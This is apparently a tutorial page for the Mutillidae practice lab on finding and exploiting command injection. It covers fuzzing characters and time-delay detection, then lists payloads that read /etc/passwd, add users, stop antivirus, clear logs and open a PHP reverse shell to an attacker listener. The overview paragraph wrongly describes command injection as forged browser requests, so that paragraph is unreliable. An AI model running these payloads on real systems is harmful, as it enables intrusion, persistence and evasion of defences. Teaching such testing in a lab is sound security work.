Command Injection (CMDi)


Overview

Command Injection may occcur when an attacker is able to run script into a users browser. To forge a legitimate request, the script creates and send the same parameters to the target website that would be sent if the user had submitted the legitimate form themselves. The target website knows the request has come from the users browser but cannot detect that the request was created and sent by a malicious script running in the users browser. As far as the target site can tell, the user submitted the request by using the web site in the expected way.

YouTubeVideo Tutorials

Discovery Methodology

Look for pages that appear to execute system commands like ping, nslookup, traceroute or CGI scripts

Attempt to identify the operating system. For example HTTP Response vanity headers like x-powered-by, Server, x-aspnet-version, etc. may infer operating system. Also look for clues such as ASP.NET runs on Windows exclusively and IIS version is tied directly to operating system version. Try to cause an error since error messages often contain hints about the underlying operating system such as the direction of the file path separators.

Fuzz with command separators like ;, & and && depending on if you are using Linux or Windows respectively.

Fuzz with characters reserved in operating system shells

/bin/bash: ! # $ % & ' ( ) * + , - . / : ; < = > ? @ [ \ ] ^ _ { | } ~
cmd.exe: % ^ & < > | ' ` , ; = ( ) ! ” [ ] . * ?

Also fuzz with non-alphanumeric ASCII characters and command injection values from Fuzz DB

Some vulnerable pages may not produce explicit output. Two methods may help detect command injection vulnerabilities in these cases may be missing output or time-delay inference

When fuzzing for command injection note when pages are missing output. In some cases an error caused by fuzzing for command injection may interupt the normal flow of execution.
  • The site may suppress error messages resulting in neither normal output nor error output.
  • The site may only display information from standard output (stdout) but not from the standard error file handle (stderr)
  • The injected value may halt execution of the shell command before the command can generate output
  • Use differential analysys to detect differences between a baseline response and other responses
By causing the response time of the increase measurably it may be possible to detect command injection without visible output Use time-delay inference comparing the average time of a normal response against an attacker chosen time delay. If the site is delayed as expected command injection has likely taken place. For example, if a page typically takes two second to load and an attacker injections a command that takes 15 seconds to execute, a response time of 17 seconds implies a vulnerability

Time-delay inference should be attempted with commands most users are allowed to execute that cause a predictable delay. ping may work well due to running in one second increments and being executable by users on Windows and Linux against the loopback interface

Windows: ping -n 15 127.0.0.1
Linux: ping -i 15 -c 2 127.0.0.1

Try prefixing and suffixing the injection with chaining characters ||, |, &&, &, `, <CRLF>, <LF>

Look for errors that are related to operating system errors, delays in responses which can be repeated by repeating the injection, or unexpected output in the response. The error may appear as an HTML comment.

Attempt to determine the operating system type.

Reserved characters used in fuzzing for command injection

&: Used to separate multiple commands on one command line. Runs the first command then the second command.

&&: Used to run the command following && only if the preceding command is successful.

|| (Windows): Used to run the command following || only if the preceding command fails. Runs the first command then runs the second command only if the first command did not complete successfully.

|| (Linux): Redirects standard output of the first command to standard input of the second command.

( ): Use to nest commands.

#: Command line comment symbol

Exploitation

Inject operating system commands methodically. "ls" and "dir" are reasonably good commands to attempt since most user accounts will have permission to execute directory listings by default and these two commands tend to be exclusive (Windows will not typically execute "ls" and Linux will typically not execute "dir" but this behavior absolutely varies)

Prefix the injections with each of the reserved characters then for each prefix suffix each injection as well.

Examples

Examples for page "dns-lookup.php"

Recon: Discover available functionality using provided help Windows XP: && help Linux: && <cmd> --help Linux: && man <cmd> Recon: Determine current directory Windows XP: && dir Linux: && pwd Recon: Chain commands to discover driectory structure Windows XP: && cd ../../.. && dir Linux: && cd ../../.. && ls -l Scanning: Get machine network settings, hostname, DNS servers, subnet mask, etc. Windows XP: && ipconfig /all Linux: && ifconfig Scanning: Discover hosts on network Windows XP: && ping -n 1 192.168.56.102 Linux: && ping -c 1 192.168.56.102 Scanning: Enumerate Current user Windows XP: && set Linux: && whoami Scanning: Enumerate users Linux: & cat /etc/passwd Scanning: Enumerate computers, users, groups, AD computers, AD users, AD groups Windows XP: && net view [/domain] Windows XP: && net user [/domain] Windows XP: && net localgroup [/domain] Gaining Access: Add user Windows XP: && net user <username> /add Linux: useradd <username> Gaining Access: Delete user Windows XP: && net user <username> /delete Gaining Access: Reverse Bash Shell Linux: Determine the IP address of the attacking host. Set up listener on attacker host such as nc -l -p 1234. Once listener set-up, ask web application server to connect back to attacker host. Set IP address appropriately. www.google.com;php -r '$sock=fsockopen("<IP>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");' Maintain Access: kill AV net stop <av process> Maintain Access: Kill AV/protective services or open backdoor services Windows XP: && net stop <service name> Windows XP: && net start telnet Windows XP: && net stop telnet Cover Tracks: Clear logs Windows XP: && wevtutil cl

Videos


YouTubeCommand Injection Explained - Part 1: The Basics
YouTubeCommand Injection Explained - Part 2: Discovery
YouTubeCommand Injection Explained - Part 3: Blind Injection
YouTubeCommand Injection Explained - Part 4: Chaining Commands
YouTubeCommand Injection Explained - Part 5: Shell
YouTubeCommand Injection Explained - Part 6: Directory Traversal
YouTubeCommand Injection to Dump Files, Start Services, and Disable Firewall
YouTubeHow to Locate the Easter egg File using Command Injection
YouTubeGaining Administrative Shell Access via Command Injection
YouTubeUsing Command Injection to Gain Remote Desktop
YouTubeSolving Password Challenge in Mutillidae with Command Injection